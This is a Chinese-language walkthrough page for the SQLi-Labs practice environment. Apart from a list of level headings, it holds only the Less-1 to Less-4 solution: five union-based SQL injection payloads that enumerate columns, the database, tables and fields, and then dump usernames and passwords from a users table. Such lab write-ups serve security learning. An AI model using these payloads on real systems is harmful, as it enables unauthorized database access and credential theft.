SQL-Labs
环境搭建
题解
less-1 -> less-4
?id=1' order by 3;--+ # 爆字段数
?id=-1' union select 1,2,database();--+ # 爆库名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';--+ # 爆表名
?id=-1' union select 1,2,group_concat(column_name) FROM information_schema.columns where table_schema='security' and table_name='users';--+ # 爆字段
?id=-1' union select 1,2,group_concat(username, " ", password) from users --+ #爆字段内容less-5 -> less-6
less-7

Less-8
Less-9 -> Less-10
Less-10
Less-11 -> Less-14
Less-15 -> Less-16
Less-16
Less-17
Less-18
Less-19
Less-20
Less-21
Less-22
Less-23
Less-24
Less-25 -> Less-25a
Less-26 -> Less-26a
Less-27 -> Less->27a
Less-28
Less-29
Less-30
Less-31
Less-32 -> Less-37
Less-38 -> Less-41
Less-42 -> Less-45
Less-46 -> Less-47
Less-48 -> Less-49
Less-50 -> Less-53
Last updated